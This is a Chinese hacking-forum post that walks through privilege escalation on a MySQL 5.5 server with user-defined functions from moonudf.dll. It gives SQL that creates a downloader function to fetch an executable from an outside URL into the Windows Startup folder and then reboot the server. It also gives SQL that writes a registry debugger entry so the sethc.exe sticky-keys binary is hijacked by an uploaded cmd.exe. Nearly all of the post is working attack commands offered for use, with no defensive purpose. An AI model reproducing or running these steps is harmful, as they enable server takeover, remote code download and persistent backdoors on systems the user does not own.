MYSQL5.5 当CMDshell无法执行的时候提权方法
作者:Tr0jan
针对这个帖子 ,http://sb.f4ck.net/thread-5064-1-1.html,给出利用方法如下
MYSQL5.5如果没有LIB目录权限允许的情况下,可以新建,在此帖子中可以正常导出DLL,
但是执行CMDSHELL的时候,执行出错,我们在这里有两个方法可以考虑
1、利用downloader函数,下载一个木马或者脚本到启动项
Create Function downloader returns string soname ‘moonudf.dll’;
select downloader(“http://www.xx.com/xx.exe”,”C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.exe“);
然后利用SHUT函数重启服务器
create function shut returns string soname ‘moonudf.dll’
select shut(‘reboot’);
但是在这个SHELL中,无法下载到启动项没有权限。
2、利用 regwrite和 regread函数劫持Sethc.exe
. Create Function regread returns string soname ‘moonudf.dll’;
Select regread(“HKEY_LOCAL_MACHINE”,”SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe”,”debugger”)
可以看到已经被劫持了,我们重新写入注册表,首先上传我们的CMD.EXE
利用regwrite写入
①Create Function regwrite returns string soname ‘moonudf.dll’;
②select regwrite(“HKEY_LOCAL_MACHINE”,”SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe”,”debugger”,”REG_SZ”,”C:\\tmp\\cmd.exe”);
登陆服务器
